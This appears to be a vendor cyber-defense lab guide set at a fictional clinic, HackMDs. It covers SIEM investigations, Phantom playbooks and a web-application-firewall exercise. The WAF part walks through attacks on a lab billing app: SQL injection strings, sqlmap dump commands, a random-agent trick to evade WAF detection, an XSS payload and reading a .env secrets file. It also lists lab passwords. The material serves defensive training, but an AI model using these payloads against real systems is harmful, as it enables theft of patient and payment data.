For our first investigation, we will look for the attack performed in Scenario 5 “Identifying an insider threat”. The attacker has accessed the inside network using RDP (3389/tcp) with stolen credentials. Once inside the 198.19.30.X network, the attacker performed scanning to find other systems to latterly access leveraging the same stolen administrator credentials used to access the inside network. The attacker’s goal is to capture sensitive data by pivoting into the HIPAA network (198.19.10.x). Once the attacker compromised a system within that network, the attacker identified sensitive data on that system and exported it off the network using Filezilla. You job is to identify the Remote Desktop behavior (3389/tcp), internal recon, pivot, and exfiltration activity using the Stealthwatch data found within QRadar.

The first behavior of interest from this attack is identifying any compromise of a sensitive system. A compromise means any system within the PCI network (198.19.10.x) being accessed by a system on another network or outside of the HackMDs network.

We start by examining the SOC dashboard. We have built an Exfiltration widget that monitors when data is pulled from a network using NetFlow from Stealthwatch. Within that widget, you will notice one IP address comes from the internal PCI network. This is a critical issue and needs to be addressed right away.

Procedure

1	Let’s click View in Log Activity. This action will bring up details about this data breach. It’s time to filter in on the impacted system.
2	Click Search, and then Select New Search. This brings up QRadars search capabilities. The first thing to do is specify a time.
3	If you performed the modules stated at the beginning of this lab, you can look for the attack behavior you created by selecting the last 24 hours via the Recent option. If you did not, choose the dates 07/01/2020 and 8/01/2020.
4	Scroll down until you see the search parameters. Type `198.19.10.101` so we can look at all activity associated with this system that sits within the HackMDs PCI network. Click the Add Filter button to add it to the search.
5	Click the Search button to start the search. You will find details regarding the data exfiltration event. First, you will see the Stealthwatch event that is related to 198.19.10.101 links to a source IP of 198.19.30.100. This connection occurred over RDP (3389) meaning a system within HackMDs but outside of the PCI network connected to a system within the PCI network. You will also see a system outside of the network (198.18.133.6) connected along with the FTP protocol (port 21) was used. Lastly, you will see the dhowser account was used. This single page clearly shows what went down, which is a major incident. Time to alert leadership and the higher-level support of this security incident! Now, let’s move to our next investigation.

Investigate Exploitation Behavior

For our next investigation, we will look at attack behavior executed during Scenario 3 “Smash and Grab”. The attacker is performing a Smash and Grab meaning targeting anybody on the Internet with a specific vulnerability. In this example, the vulnerability is a Struts2 vulnerability, which exists on a server within the HackMDs DMZ. That DMZ has been exploited and the attacker has opened a terminal with root level access. This is like many attacks such as the SAMSAM ransomware abusing jboss.

Procedure

1	Let’s start off by going back to the main HackMDS SOC View Dashboard. This time we want to investigate the exploitation behavior against the apache struts vulnerability. The first place we can look is within the Exploits by Type widget. We can see Remote Code Executed, which is bad and something we should investigate. Double Click “View in Log Activity” to get more details on these events. This will bring you to the Log Activity tab for these events meaning a filtered applied to see Exploits by Type. You first need to make sure you have adjusted the time to July 1st – July 30th.
2	Scroll down so you can see the categories of attack. We are interested in the Remote Code Execution so let’s click the Multiple next to the under Source IP to see details on the source of this attack.
3	Scroll down further to find there are two systems associated with this attack. One has an outside IP address of 198.18.133.6. This isn’t good. Let’s click Multiple next to this IP to see how this external system launched a remote code attack. This will bring up details around the attack that is covered in the exploit of the Struts vulnerability module in this document. You can see who the attacker is, what exploit they used, and which systems were impacted. It’s time to alert leadership about this critical breach! Note that there may be other ways to identify this exploitation behavior using QRadar. As you can see, the event data is clear and easy to follow, regarding which systems are being attacked, what type of attack was used, and why the attack was successful. This tells you how vulnerable the target of the attack currently is. Next, we will move on to the insider threat behavior.

Investigate Compromised Laptop

Procedure

1	Let’s go back to the HackMDS SOC View dashboard. Be aware that our concern is ISE implementing a quarantine on a VPN user due to some violation in policy. We have created a widget that monitors for “quarantine” alarms from ISE called “VPN Quarantine” located on the bottom right of the SOC dashboard. You will see 198.19.40.51 stands out as a top violator. If you don’t see any events, its likely you have not adjusted the time. That’s ok. We can adjust the time in the next step.
2	Click View in Log Activity to see more details.
3	First, make sure the time is correct regarding when you are looking for Quarantine activity. If you have not performed the compromised laptop lab, set the time between July 1st, 2020 and August 1st, 2020. Details will show these are CORRELATION EVENTS meaning events triggered by Firepower, which tell ISE to quarantine the device. We can see dhowser is associated with some of these events. The SOC would investigate the user’s status within Cisco ISE, which the next image shows how dhowser has been quarantined. There could be many other ways to find this and other malicious activity using QRadar. The native search and dashboards also showcase details that could lead a SOC towards these events as well as the desktop support team using the vulnerability data found under the assets tab. Feel free to explore the QRadar dashboard to learn more about this fantastic security event and information management product. Congratulations! You have now completed this scenario.

SOAR: Automation and Response with Splunk Phantom

Value Proposition: Being able to identify and contain an attack is valuable to your SOC. However, having the capability to automate a series of actions puts your SOC in an even better position to quickly remediate threats. Automation leads to saved time, consistent responses, and faster results. The entire security industry is moving towards automation and orchestration as these capabilities lead to a mature security operation center (SOC).

Outcome

In this scenario, you will have a basic understanding of how a SOAR such as Phantom can automate tasks for a threat response situation. Specifically, you will see how Phantom can automate the following tasks leveraging two Playbooks:

Disable a user account in Active Directory
Re-enable a user account in AD after learning the employee was an innocent bystander

Lab Resources

SIEM: Splunk Enterprise
SOAR: Splunk Phantom
SIEM Data Resources: Firepower, Stealthwatch, ISE
Installed Phantom Applications: Cisco Firepower App, Cisco ISE, VirusTotal

In this lab, you represent the HackMDs SOC manager. After attending the Blackhat and DEFCON conference, you have learned about the value of applying automation and orchestration to your SOC to improve your incident response service. You convinced leadership to acquire a SOAR known as Splunk Phantom and the Splunk Phantom consultant assisted with building two playbooks designed around how your SOC responded to a recent beach caused by an insider threat. You will now oversee how Phantom is used to prevent a future internal breach.

Phantom events are based on what is seen by Splunk. All HackMDs security tools send events to Splunk hence Phantom’s alarms are a consolidated view of all security events processed by Splunk. The value of Phantom is to quickly be able to investigate events and eventually automate response when applicable.

Execute Existing “Disable AD User” Playbook

For this first situation, you will be executing an existing playbook named "Disable AD User" when an internal system is identified as being compromised. Your SOC developed this playbook based on the Cyber Defense Clinic "Insider Threat" scenario where one of your internal hosts was found to be compromised and exfiltrating sensitive data from the HackMDs doctor network. Your SOC was able to identify the compromised system as a contractor PC, based on malicious behavior seen from the system, including port scanning, remote desktop access between networks and HIPAA-related data being sent off-network. Did the contractor inadvertently download a malicious file? Or perhaps the credentials of this user had been compromised and a malicious actor logged into the contractor PC to detonate the malware? We need to find out by investigating Phantom’s event logs. Phantom is configured to receive security events seen by your SOC’s SIEM, Splunk, which is your centralized data collection tool. See the "Execute a Centralized Defense" scenario to learn more about the value of a SIEM including Splunk and QRadar.

In the first part of this scenario, you will research recent event activity. If you identify a compromised host, you can leverage the new Disable AD User playbook to automate your response.

Procedure

1	Using the Windows Jump Host, launch the Firefox browser. Select the Phantom \| Dashboard bookmark to access the Phantom dashboard. You can also go to https://198.19.10.150. Log in with admin / C1sco12345.
2	From the Phantom dashboard home page, select the Home tab from the menu bar. You will see various widgets that describe a summary of events, playbooks, and automation ROI metrics. Ensure that the time range on the top left is set to Last Year. Click the Events by Status widget.
3	This will bring up the Events view table. Select the search field in the top left of the screen and type Contractor to search for events associated with your contractors. You are doing this based on how, in the past, your contractors have been the source of internal threats. You should see an event displayed in the list with name Malware_from_Contractor. Select that event.
4	In the next screen, you will see a timeline of when that ‘Malware_from Contractor’ event was seen. You will also see Activity, Workbook, and Guidance tabs on the left that can help you investigate this event. Let’s look at the details of the ‘Malware_from_Contractor’ event by clicking it.
5	An Artifact Details window displays the details associated with this event, such as the Name, Start time, Severity, etc. Note in the Artifact Details window that the ‘sourceUserName’ is dhowser.
6	Great, it looks like one of your contractors named dhowser is possibly compromised. Let’s further investigate this user, by searching for events for the username dhowser. Select the green CLOSE button to close the Artifact Details window. You will be returned to the Investigation Timeline screen. Type ‘`dhowser`’ into the search field:
7	Scroll down and view the associated events with dhowser. You will see a few ‘Data_Exfiltration’ events. Oh no, you once again have data leaving your sensitive network! Click the event and you will be taken to the Investigation page with a focus on this event.
8	Click the event details name Data Exfiltration and you will see the Artifact Details below it. Notice the sourceUsername for this event is also dhowser. This confirms that his system is the source of the trouble. You have all the evidence you need to confirm this system is a threat to the HackMDs network. You could also perform similar threat hunting within Splunk. However, Splunk cannot take any actions since it is a SIEM, which was done in the "Execute a Centralized Defense (Splunk and IBM QRadar)" scenario. It's time to use a Phantom Playbook to disable the dhowser account in AD and notify HR! This represents a common use case for using a SOAR.
9	Search again for the username dhowser. This time, select the Malware_From_Contratctor event:
10	Let’s use the Guidance tab to run the playbook. Select the Guidance tab, then under PLAYBOOKS, click the playbook named CDC_V4_Malicious_insider_containment. Click the green RUN PLAYBOOK button to run the playbook:
11	To check the status of (and interact if needed) with the playbook, click the Activity tab. Scroll down to the playbook you just launched. You can click the triangles to open details about what the playbook launched. Click the triangle next to CDC_V4_malicious_insider_user. Note: You will not want to run this playbook against any activity that the playbook already ran against. You can tell which actions have been performed by noticing the white checkmarks beside those actions. If you run the playbook and see the following error message, that means the playbook has already been launched against the event. Please go back and choose a different Malware_From_Contratctor event. You want to find one that does not have all of the white checkmarks which means all actions have NOT been taken.
12	You will see a white check next to playbook items that have completed, and a clock symbol next to items that require your interaction. Click the Notify_HR text next to the clock symbol. This will allow you to type an explanation to HR. Note: All actions are not checked since all actions have not been completed yet.
13	Type an appropriate response, such as “Disabling dhowser user account pending further investigation,” and then press the green COMPLETE button:
14	Next, let’s confirm we want to disable the dhowser account. To do so, click the User_disabling step in the playbook.
15	This will bring up a separate window which will prompt you to select Yes to confirm disabling the user. After selecting Yes, press the green COMPLETE button:
16	Now let’s confirm that dhowser account has indeed been disabled. Try logging into the DR workstation to confirm the dhowser user has been disabled. You can log in to the DR workstation by using the Remote Desktop link on the Jumphost desktop:
17	Log in with username hackmds/dhowser and password C1sco12345. You should notice that the account has been disabled:

Re-enable Impacted User Playbook

Procedure

1	Now, let’s assume that some remediation was taken and the dhowser system is now allowed back on the network. Let’s re-enable the dhowser account with another Phantom playbook. On the Phantom INVESTIGATION page, click the Guidance tab on the left. In the Guidance tab, click the CDC_v4_Enable_User playbook, and then confirm running the playbook by clicking the green RUN PLAYBOOK button.
2	After re-enabling the dhowser user, try logging back into the DR workstation. You will be able to successfully log in.
3	Next, let’s take a closer look by reviewing the “Disable AD User” playbook. Go back to the homepage dashboard and select Home and then Playbooks.
4	From this screen, search CDC to narrow your search and select the playbook named CDC_v4_malicious_insider_user_containment.
5	You will notice the Playbook editor screen displays, with a playbook that looks similar to the following image.
6	Investigate each of the logic blocks. You will see some CEF (Common Event Format) fields that are used. For example, click the file reputation block, and then click Python Playbook Editor to see that the CEF field (artifact:*.cef.fileHash) is used to populate the container_data variable:
7	Repeat the same process for the get user attributes block and you will see CEF field sourceUserName (artifact:*.cef.sourceUserName) as the identifier of the malicious insider/stolen credential.
8	From the sourceUserName CEF field, the user attributes are obtained from LDAP for the purpose of documenting details. The format block following the get user attributes action handles this. The next step is to prompt the SOC analyst (or other user selected by playbook user/author) about whether the containment actions on the user should be carried out. If the response is positive (User chooses option YES), then the disable user call is executed using LDAP. This could be followed by a ticket being created in a ticket management solution such as ServiceNow. The event is closed at the end of the playbook run.

At the start of the playbook and in parallel to the automated action execution, the file hash for the event is checked with VirusTotal. In addition, a manual task is assigned to the admin (or other user selected by the playbook user/author) to notify HR of the malicious insider/stolen account event.

Use NIST 800-61 for Case Management

Now that you have successfully used your playbooks as part of your incident response program, the next step would be to incorporate it into your incident response program. One popular industry guideline for handing computer security incidents is NIST 800-61. Phantom allows events to be run through NIST 800-61 best practices which includes activities involved with the following:

Detection – How to detect that an event has occurred and confirm it is a true positive
Analysis and Containment – How to identify all impact and contain the threat from spreading
Eradication – How to remove the threat from all systems
Recovery – What steps are needed to return all impacted systems and networks to a normal operation state
Post incident Activity – What was learned and how can the SOC improve the response

Procedure

1	Any event in Phantom can be run through the NIST 800-61 process. Click the Splunk Phantom logo on the top left to go to the home page. Search for “contractor” to bring up the events we already investigated. Select any event.
2	You should see the event details. This time, let’s click the folder icon at the top right.
3	We can promote the event to a case, using an NIST 800-61 Workbook, or we can create our own Workbook. In this case, select the NIST 800-61 Workbook to use NIST 800-61:
4	After converting the event in a case, we can work in different activities according to NIST 800-61 computer security incident handling best practices. Within the Workbook tab, expand each of these activities to examine what workbook tasks you should consider researching with this case:

This is just a small representation of the value a SOC can obtain as a result of using a security orchestration, automation, and response (SOAR) solution such as Phantom. Feel free to check out other features within Phantom.

Congratulations! You have completed this scenario.

Web Defense and Resource Sustainability Part 1: WAF Focus

Value Proposition: With the proliferation of the cloud and the digital services and mobile apps it hosts, today’s organizations are heavily invested in their presence on the web. These investments introduce new challenges for security, since a traditional firewall provides very little defense against web application attacks. Firewalls provide perimeter protection; however, firewalls lack the capability to defend against SQL injection, DDoS and other web application-focused attacks. Securing web applications requires specialized firewalls that focuses on layer 7 aka the application layer. Check out the latest OWASP Top 10 web application security vulnerabilities to learn more about this threat vector.

In this scenario, Mr. Black has tasked his favorite script kiddie, Mr. Orange to steal sensitive data from HackMDs. Stolen data will be used to extort HackMDs leadership or sold on the darknet. Mr. Black has identified that a new HackMDs Billing Portal has been launched and will be Mr. Orange’s target for this attack.

After watching videos on YouTube, Mr. Orange has concluded that attacking many Web Applications is a simple task. First, Mr. Orange will scan the new HackMDs billing site using the ZAP tool. This tool will scan for OWASP’s Top 10 vulnerabilities, which many vulnerabilities can lead to disclosure of sensitive data and exploitation of the web application. Several vulnerabilities are likely to be found on the HackMDs new billing site including the following as defined by OWASP:

A1: Injection: The application is susceptible to SQL Injection using the ‘invoice=’ parameter / value pair.

FIX: Injection should be resolved in the application, however in instances where you can’t fix the application, a solution such as the Radware AppWall WAF can prevent exploitation.

A1: Injection: The billing application has debug functionality that when called can display running processes on the system. An attacker is also in control of the values being called, which is how command injection is invoked.

FIX: This application is designed poorly. While Radware AppWall could control the parameters being called so that they are not manipulated, the best solution for this situation is to fix the application.

A5: Broken Access Control: Incrementing the values in the ‘invoices=’ parameter can disclose PII. Using the ZAP Fuzzer, an attacker can enumerate all the PII.

FIX: This application needs to restrict access by additional validations to view data.

A7: Cross-Site Scripting (XSS): The Application is susceptible to XSS in the invoice= parameter.

FIX: The best solution is to fix the application however, Radware AppWall can also provide protection in the event one cannot immediately patch the application.

Mr. Orange armed with this information has several options. One option is to constrain his attack to the webserver and extract just the PII in the server. Another option is to drop a cryptominer in the server and attempt to gain additional monetary value from the attack. A third option could be to use this server as a launching point to gain access into the HackMDs network. Accomplishing one or more of these objectives will be a win for Mr. Orange and prove he is ready for more elite hacking tasks.

Outcome

At the end of this scenario, you will have delivered several Web Application exploitation attacks exploiting a new HackMDS billing server. You will first discover the application, look for vulnerabilities, and attempt to either take control of the server or steal data within the server. The HackMDS server is in the DMZ. Compromising this system could also provide a foothold into the network. Did the HackMDs team secure their DMZ so that servers are not able to talk to other systems without restriction?

All your Web Apps ARE Belong to Us!!!

After completing the exploitation of the HackMDS billing application, you will switch roles to the defense team. As the defender, you will monitor traffic types coming into the billing server. There are certain attacks which can be stopped by a next generation firewall (NGFW) such as Cisco Firepower NGIPS, but most NGFWs are tuned and designed to prevent network attacks rather than dynamic Web Attacks. HackMDs has juts implemented a Radware WAF, which can prevent many types of dynamic attacks. Nothing is 100% and sophisticated attackers can attempt to bypass a WAF, however for most of the attacks seen on the Web, a WAF provides the additional layer of security that is needed to properly safeguard Web Applications.

Lab Resources

Attacker Resource 1: Kali Linux Rolling Edition (includes tools that we can use.)
Target Resource 1: HackMDs DMZ server running Ubuntu
Defender Resource 1: Radware Alteon running AppWall
Defender Resource 4: Endpoint Logging and Endpoint Controls

In this lab, Mr. Orange will exploit a new HackMDs Web Application used for validating invoices. If you have used a payment application on the internet for medical invoicing and billing of services, this application may seem familiar. The new HackMDs application, however, is horribly designed to allow for an attacker to enumerate all accounts and many other nefarious actions.

Who wrote this app?

Explore the Application

Procedure

1	Connect to the Kali Linux server.
2	Open the Firefox web browser on Kali Linux, which is the icon at the bottom of the screen showing a globe and arrow.
3	Click the ZAP icon to open the ZAP Web Browser, and then leave it running in the background.
4	If ZAP asks you to update a few things, click Update All, and then close the pop-up when updates are complete.
5	With Firefox open, go to www.hackmds.com or click the hackmds.com tab. The website will show a menu item (1) for secured billing. Click this menu item.
6	Within the Firefox browser, turn on proxy through ZAP by using the Proxy Button. This proxy button will allow traffic to THROUGH ZAP or around ZAP. Clicking the Circle will allow you bypass ZAP (grey icon) or proxy through ZAP (light blue icon). For this exercise, we want the light blue icon.
7	If you see a certification error after enabling ZAP, click advanced and accept the risk.
8	Reload the page in Firefox and switch to ZAP by clicking the ZAP tab at the top. You should see sites appear in ZAP. Look for www.hackmds.com, as shown below. On the left is the Sites tree. On the right is the Request that go to the server and Response from the server. Now that Mr. Orange is setup and ready to go, let’s explore the billing web application. This application has a form and the instructions are straightforward. Let’s try entering an eight-digit number such as 00000001. What happens if we enter this number?
9	Enter `00000001` to see if we get any data. You should see a few things occur. Going from top to bottom, the Invoice number is reflected directly back. Could this be an injection point for XSS? Next, we have both Credit Card Number and Email.
10	Let’s work these vulnerabilities one at a time. First, can we enumerate more than one number? Let’s try `00000002`. Go to the top of the browser and edit the URL so that the 1 is a 2. You should see some strange behavior including a SQL Statement? Is this debug output?
11	We have a few options to abuse this vulnerability. One of which is to rotate the numbers one at a time until we find more data. While going 0-10 is easy, how many combinations are in 8 digits? The answer is 10^8th power or 100,000,000 attempts, which will take forever to run through. There is a faster way. First let’s see if we can rotate numbers in ZAP. Let’s use the Fuzz utility in ZAP to see if we can get a few more pieces of data. Go to ZAP by clicking the tab at the top.
12	On the left panel of ZAP, locate in the tree the billing folder by clicking the triangle next to the www.hackmds.com folder and work your way down into what was found. Work your way to the “GET” called invcheck.php (invoice). You will see the request in the request tab in the right side window. In there you will see the 00000001. Highlight the 1.
13	Right-click the highlighted 1 and in the menu choose fuzz.
14	The Fuzz menu by default will have a colored highlight item. To choose the type of payload, click Payloads….
15	Next choose Add.
16	Next, we much choose a Fuzzer payload. Let’s choose Numberzz, which will give us a set of numbers.
17	To configure Numberzz let’s make the following changes. From: `1` To: `9` Increment: `1`
18	Click Generate Preview. If you get a list of numbers 1 – 9, click Add.
19	When this is complete, you can click the OK button and click Start Fuzzer. This will allow you to start Fuzzing the website.
20	At the bottom of the screen, you will see the fuzzer results. Sort this area by “Size Resp. Body”. This will allow us to look for pages that are larger than other pages. You will find 3 webpages that are in fact larger. 00000001, 5, and 8 by searching in the response window. You can manually visit these sites, view the details of the response window, and move on. Could there be more data than what was displayed by these three invoices? Mr. Orange (you) will attempt the next attack which is to look for SQL Injection. Many attackers may just point SQLMap at the website. For this exercise, you will play with the application by hand.
21	On the billing page, enter a single quote (') in the billing name. You will find what is known as Error’s Based SQL, which in on the internet is rare as most scanners find this easily and exploit it. You may however see this vulnerability on an internal network.
22	There are two things to notice. First, the error itself and second is debug output. We could manually dump the contents of the table in the database by entering or 1=1;-- (the first character is two characters). Try it and you will see the contents of the database.
23	Wow, that displayed a bunch of patient records. That works but let’s try a better approach by using the following SQLMap commands. Open a terminal window in Kali found at the bottom.
24	From the window type the following: `sqlmap -u ‘http://www.hackmds.com/billing/invcheck.php?invoices=1’ –batch`
25	The command syntax can be difficult to read at times. There is a text file in the /root/Documents folder that will help you. Bring it up, right-click the command you want and select copy and paste. Type this into a command prompt to see the help file you can copy from. `cat /root/Documents/waf-attacks.txt`
26	This should be the final output of the command if you typed it correctly (or copied it). The highlighted sections show that indeed the SQL database is injectable. Let’s attempt to dump the contents of it by specifying the --dump command. Press up to bring up the command you entered to show this input and change the last part “--batch” to “--dump”
27	Specifying this command, we see the entire set of databases. Mr. Orange also believes that there could be cross site script (XSS) vulnerability in the application. With XSS he could manipulate computers inside of HackMDS to deliver malicious JavaScript through phishing and other mechanisms. To find the XSS you must intercept the transaction BETWEEN the browser and the server.
28	Go back to the main billing page but don’t submit anything yet.
29	Go back to ZAP and click the green radio button on the top of the application. This will change its color to red.
30	You now have a new tab called Break, which will intercept and pause all transactions to allow you to freely manipulate them. At this point, you have paused your ability to interact with the website until you permit traffic to play again. Go back to the main billing page, enter a number `1` for the invoice number. Note: If you didn’t go to the billing page before pausing your session in ZAP, you will first need to un-pause the session by changing the circle button in ZAP back to green and going to the main billing page in Firefox. After bringing up the bill page, go back to ZAP and change the green radio button to red. Note: Everything will be paused at this point when the break button is red in ZAP. You must go back to ZAP before you can continue.
31	Go back to the ZAP Proxy. You should see the captured request in the right window, and it will be editable.
32	Change the 1 to the following: `<script>alert(1)</script>`
33	Click the play button to enable the edited version of traffic continue. Note: We provided this in the WAF-attacks.txt file, as well. When you return to Firefox you should see the 1 pop-up box. This result shows this site is vulnerable to reflective Cross site scripting! This means that we can send links to internal users and get them to execute evil javascript to control their browsers.
34	The final vulnerability Mr. Orange will investigate will be seen through scanning. The website www.hackmds.com is hosted on 198.19.20.5. Let’s navigate to this directory by typing http://198.19.20.5 in the Firefox web browser. We should see directory browsing: This happens often with default Apache2 installations. In addition, you can start enumerating for hidden files. One particularly bad file to find would be a .env file. These files typically contain keys and other sensitive information that could hijack accounts.
35	In Firefox, navigate to: http://198.19.20.5/.env. We should now see the contents of a very sensitive file: Mr. Orange is satisfied with what he’s gained so far and he’s happy to go back to Mr. Black for his cash reward. Mr. Black can use this vulnerable application to launch attacks against HackMDs users as well as pull-down sensitive data using what was found by Mr. Orange. The results would be a very bad day for the HackMDs organization!

Defend Web Resources with Web Application Firewalls

How can you defend against web application attacks? Next Generation Firewalls may help but most are not designed for application-based exploitation. Instead, we will use a Web Application Firewall (WAF). There are a few ways that a Web Application Firewall can be installed. The most common are Inline as a gateway or configuring the WAF to act as a proxy. We will be implementing the new HackMDs WAF in one-armed Proxy mode living on the same Layer 3 (network) environment as the web server. To do this, we must configure two things. First, we must set the WAF as a listener, which will be on 198.19.20.7. Next, we need a Proxy IP to return the traffic, which will be 198.19.20.4. We can now send all 198.19.20.7 traffic for www.hackmds.com specifically to the webserver. The new WAF design will look as the following.

To ensure that this works, we have created a new test URL to send all traffic to (secured.hackmds.com). This will allow all web traffic to be redirected over to the web server for inspection by the WAF. This will prevent attacks that are specifically designed for webservers. You can also perform SSL Man in the Middle inspection if you need to for these webservers or provide SSL Encryption.

Procedure

1	To start off the role of the defender, click the back arrow to return to the GUAC server. Select the jumphost.
2	On the jumphost (not kali attack server), open the Firefox web browser. You should see multiple tools come up including tabs for the Radware Alteon – WAF. You can also bring it up by clicking the Radware Alteon – WAF bookmark. The username is: admin the password is: `C1sco21345`.
3	You should see the main Radware Alteon dashboard. Next, we will go to the Forensics view by clicking the Forensics button.
4	On the Forensics Screen, click the gray arrows and open Alteon -> Security -> HackMDS-Simplified. You will need to scroll down a little to see the HackMDS-Simplified option.
5	You may seem some attacks already. If you want to trash those results, you can click the trashcan icon on the bottom of the list to remove those. The WAF will prompt you to “delete all?”, which you must say yes to remove those logs. With this view set up, you can monitor application exploitation.
6	Let’s go back to the Kali Attack desktop.
7	When you are in the Kail Attack desktop, go to the secured version of the web portal found at http://secured.hackmds.com. You can access this by clicking the bookmark or typing it in. Note: Use http://secured.hackmds.com.
8	Click the Secured Billing portal.
9	In the Invoice Number search field, type `‘`. Once you do this, you will now see a new screen that shows a default block page. You may wish to obscure this with a generic message, but for the purposes of this demo we are leaving the OBVIOUS block. This block page is customizable.
10	Next, let’s go to the Jumphost again and click the HackMDS-Simplified view in Radware to see what the defense would see after this attack is launched. You will see the attack data within the Events window within AppWall. New events with the words “SQL Injection” will appear.” Ensure you are in the HackMDS-Simplified view to see this data.
11	Click the event that states “Database” found under the “Generated By” tab. Other events will say “Security Filters – Vulnerabilities”. The Database event should be under multiple “Security Filters – Vulnerabilities” events. It’s clear from the description below what caused the WAF to trigger. You can see these details in the description window after you select the event including the database. Let’s explore some more attacks.
12	Go back to the Kali workstation and bring up the command lined that used the sqlmap tool. Run the original command for discovering SQL injection by pressing up or retying the command. This time we will change the URL to secured.hackmds.com instead of www.hackmds.com as shown: `sqlmap -u ‘http://secured.hackmds.com/billing/invcheck.php?invoice=1’ –batch` You should see errors now, rather than having the success you had exploiting the unsecured version of the billing website. One of the configurations that HackMDS added to the WAF was an automatic penalization feature. As numerous events appear from a single IP address, the WAF eventually will automatically block the IP address. This automated exploitation will trigger the automatic blacklist of the Kali Linux attack server.
13	To continue the lab, we will need to unblock ourselves. Let’s switch to the JumpHost and unblock our attacker. Looking back at the events within the AppWall WAF, you will see the top event has now blocked the attacker’s IP address. Note: While some of these features are important to implement, an attacker can circumvent some of these by using cloud based environments to launch attacks.
14	Let’s unblock our attacker IP. Within Radware AppWall. Go to Configuration > Alteon > Services > Source Blocking > Blocked Sources.
15	Finally, click the IP Address (our kali linux attacker IP), and then click Submit. This will clear the block.
16	Let’s now click Forensics and return to our HackMDS-Simplified View.
17	Click one of the SQL Injection threats that was generated by “Security Filters – Vulnerabilities” and read the description. The language in description states ‘Automatic’ SQL injection and database takeover tool. This seems to imply that the SQLMap user agent string could have been detected. Let’s switch back to the Kali Attacking device and attempt to circumvent this check for the SQLMap User Agent String. As the attacker, you can assume this is how the detection works. You can perform a new attack simply by adding a ‘random-agent’ switch. This will not send the default user-agent string from sqlmap. Instead, it will use a random User Agent which will simulate a standard Web Browser. The default user agent string that is used by SQLMap states it is sqlmap and many WAF’s will block this one value alone. Let’s see how this WAF behaves by bypassing this one check. Maybe Mr. Orange can beat the WAF???
18	Within the command line on the Kali Linux server, run the following command: `sqlmap -u ‘http://secured.hackmds.com/billing/invcheck.php?invoice=1’ --random-agent --batch` You should once again see errors in the scanning. RATS!!!!
19	Switch back to the jumphost and view the AppWall.
20	Refresh your browser to see additional attacks. Many of these attacks are going to reflect that SQL Injected was manually attempted. This is different than an automatic tool being attacked as every request now must be validated for injection attempts. Click some of the results to view the details of the results from the attack.
21	This automated attack may have blacklisted our Kali Linux attack system again. Repeat the steps to unblock the kali linux attack server within AppWall. Mr. Orange also tried XSS attacks against the server which could led to exploiting hosts that visit the website as well as other malicious outcomes. Let’s see what happens when we attempt our XSS Injection on the secured version of the billing portal.
22	Switching back to the Kali attack server, use Firefox to visit the secured version of the billing website: http://secured.hackmds.com/billing or click the bookmark and select “secured billing portal”. This should take you to the page in which we can enter an invoice number:
23	Enter the number 1, but DO NOT hit submit. Let’s first setup ZAP.
24	Go back to ZAP. You will once again click the interception button to change it from green to red.
25	At this point, we are ready to submit our attack since the next action will be paused and shown in the “break” section of ZAP.
26	Go back to Firefox and submit the number 1 by clicking submit.
27	Go back to ZAP and our transaction should be paused in the break tab.
28	Let’s modify the captured session. Instead of invoice=1, let’s type `invoice=<script>alert(1)</script>`.
29	Click the Play button to send the modified transaction to the web application representing an injection attack. This attack will bring up the Block Page in the Firefox Browser.
30	Next, switch back to the Jumphost and look for the new Alert within AppWall. Click the threat titled Cross Site Scripting. This specific input field of <script> is obvious and easily caught by the Radware WAF.
31	For our final attack against the secured WAF, go back to the Kali Linux attack server.
32	Let’s attempt to look at the directories with sensitive information. Using Firefox in Kali Linux, go to the following URL’s. http://198.19.20.7/ http://198.19.20.7/.env None of these should work. Instead, you should see the same block page. Note: We are using the .7 IP address because .5 is straight to the webserver and bypasses the WAF. The WAF is listening on .7. This is done to simplify testing the unsecured and secured version of the HackMDs billing application. Oh no! We can see that all the attacks failed.
33	One final item to try is capturing sensitive data by viewing client invoices: Go back to the Kali Linux attack server and go to the secured version of the billing page via http://secured.hackmds.com/billing. Optionally, you can click the bookmark and then select secured billing portal. Try looking at invoice 00000001. The difference is now sensitive data protections are enabled by the Radware WAF. Specifically, The WAR masks the Credit Card Number with XXXXs. Radware offers various forms of data loss protection capabilities based on automatically masking sensitive items such as social security numbers, credit card numbers and many other options. At this point, you have tested exploitation of an unsecured and secured web application. Take some time to click around the Radware AppWall Web Application Firewall as well as its centralized management console Vision found within the tabs of tools available to access on the defender jumphost desktop. Look out for future versions of the Cyber Defense Clinic that will feature Radware DDoS solutions as we as Centralized Management through Radware Vision, Splunk and QRadar! Congratulations! You have completed this scenario.

Web Defense and Resource Sustainability Part 2: DDoS Focus

Value Proposition: Mr. Orange failed to use web exploitation against the HackMDs web applications due to HackMDs’s recently deployed web application firewall. Mr. Black has instructed Mr. Orange to change tactics and focus on taking out the applications using denial of service attacks. By taking down the HackMDs web applications, Mr. Black will cause a major disruption in the HackMDs business due to patients not being able to schedule appointments, access their records or other online transactions. Mr. Black can use the blackout as an opportunity to exploit other systems while the HackMDs SOC is distracted, maintain the blackout until HackMDs experiences enough loss to go out of business, or ask for a ransom to avoid further disruption. First, Mr. Black needs Mr. Orange to prove through experimenting with different denial of service tools that Mr. Orange is capable of disrupting HackMDs’s web applications.

About BDoS Attacks: Behavioral DDoS (BDoS) defense is a capability that differentiates Radware. Unlike other approaches in the market, DefensePro looks at multiple dimensions of traffic including the rate of traffic types, specific traffic parameters and the ratio of different parameters within the IP flow to accurately detect, characterize and generate mitigation filters to address zero-day attacks and maintain service under adaptive threat. The Radware security solution can detect attacks regardless of their volume, including targeted application attacks that may or may not have a volumetric component.

At the end of this scenario, you will have delivered two different denial of service attacks with the goal of disrupting the HackMDs web applications. You will also learn how to defend against both protocol and volume-based DDoS attacks using Radware’s Defense Pro solution.

There are three general types of denial-of-service attacks:

Volume-Based Attacks: These are the most common version of a DDoS. The attacker leverages multiple systems and internet connections to flood a website with traffic with the goal of overwhelming the target.
Protocol Attacks: Unlike volume-based attacks protocol attacks aim to exhaust sever resources instead of bandwidth. This means one system could render a webs server unavailable if that attacker system is able to consume enough of its resources.
Application Layer Attacks: A application layer attack generally requires fewer resources than a volume-based or protocol denial of service attack. This attack targets vulnerabilities within applications such as Apache, Windows and OpenBSD. A common version of this attack is the attacker submitting a large number of requests that appear legitimate at first until the application becomes unavailable.

Lab Resources for this scenario include:

Attacker Resource 1: Kali Linux Rolling Edition (includes tools that we can use.)
Target Resource 1: HackMDs DMZ server running Ubuntu
Defender Resource 1: Radware Defense Pro
Defender Resource 4: Radware Vision

